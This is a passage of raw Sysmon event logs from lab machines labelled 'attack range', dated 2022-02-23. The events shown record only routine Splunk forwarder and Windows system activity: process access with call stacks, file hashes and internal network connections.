11:24:53.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:53.457{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:54.643{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07EF42F7F4E1A73CB24672EA1638B0DD,SHA256=E4693A4F44119CB8648017F46FB4E90F86B8477B710784E6962EFA7C539040DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:52.466{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51741-false10.0.1.12-8000- 23542300x8000000000000000222827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:54.478{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8CFA7F2060B42E887B5BA0131CFF2A,SHA256=1702E3CF280A09DCE0DADD8C72D18703DA6A09D4F21B3AE037110E0FF604F6F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:51.505{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49574-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:55.658{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83D5C93DF9011DC442DEFD9D4493481D,SHA256=4312CB39DA671A100B29FED7A7CB13684473B6F7C5BAEE3A2DCD6368C43BDFB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:55.525{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF30528FDEC67DBD9069CB4C7AC5F35,SHA256=65BB83DA686CF775BA600EA5A35B55481CDA06B948E37B4E8BD96672F53B16DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:56.541{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67ABD641F8A8D5261F5F77A5D1E57C2,SHA256=7B99DB99E70F4CC0FB06F4D2A7A2831AAB33E25C27F3A0BF3406660A90904053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:56.673{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A378A33CD7357AA0FB5DE29BD7BB41,SHA256=A6322FFE2A9732FF073B1BC0F86C77BC7232D821CD4D02BBD269EAB77D6FA24E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:57.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B3DF7244330D225BD02E0ED429CBC1,SHA256=8D45F7DE9AE1BC374F80A4C7D80743AADED2EE02A30FC92F6F7F81A4A42D653B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:57.634{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8008E61D5432B9D44ED4AD1A19115BBC,SHA256=F722917069A2AE1CD18E83BD4AAB002D3EB8FCF50BFEA2E46BB123E236348EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:58.704{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E5C248A2BBBC8BEA4A666783E319C2,SHA256=C7B3B345D1F943C21EF7A6A638D4325669C17916E8A9377A35D3884BF94D676D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:58.728{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B6D42C7EA8E556EC0CF1B7EBAA3DF25,SHA256=99FD34FE91BBC740163F70B8FDAA169067A6FB2F8019A00B6A17B135A92B07B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:59.724{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F095C758C18A38B9C44A608040C2C632,SHA256=D52A6DE13377357AB5E297E1B0D19EFF720B7A854F2397DD39E532FAA88400B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:57.575{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51742-false10.0.1.12-8000- 23542300x8000000000000000222833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:59.744{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC70E32F0169038744BCB45653813113,SHA256=FD2515325D286D9174EE512B5C7A77732DAFEAF49D8EF1CEECBC7A85EEB510C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:56.682{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49575-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:00.742{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64BDA629BDA0B2AE94BC9D2C27FA88C,SHA256=C8FD3234DDFAAFC0D62CDB43FDAE0A49639456EB900715BA0CD5F458E91CA08E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:00.791{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1A8B795DB13429AB1003E2C2E2AAA0,SHA256=5092C8972BDF7E15B6762524D988C2CF89CF5EDFBD388AE020C98EC79C6FD056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.743{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC3F828A1CD859403B59B8EC197D2423,SHA256=E603741F0FDC135BE69FCC8D3CF8A589CA6F6B1203F747F180F98D79A8D7018D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.458{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-198D-6216-6807-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-198D-6216-6807-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.442{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-198D-6216-6807-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:01.444{C8EA50B7-198D-6216-6807-000000003802}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.908{C8EA50B7-198E-6216-6907-000000003802}36926576C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.792{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3A268FC9C179B023283DBA402F5417F,SHA256=C6721480AB2BD2C94BB8701F58F71F36A9F676261F5A01E0DB741BE45425ABE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:02.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC92301E49C8C58699740293F36C1B1,SHA256=644E077412209160EFD6B377D59D1A6165207495C6034D00DA3EE98A361C67A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-198E-6216-6907-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:02.058{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-198E-6216-6907-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 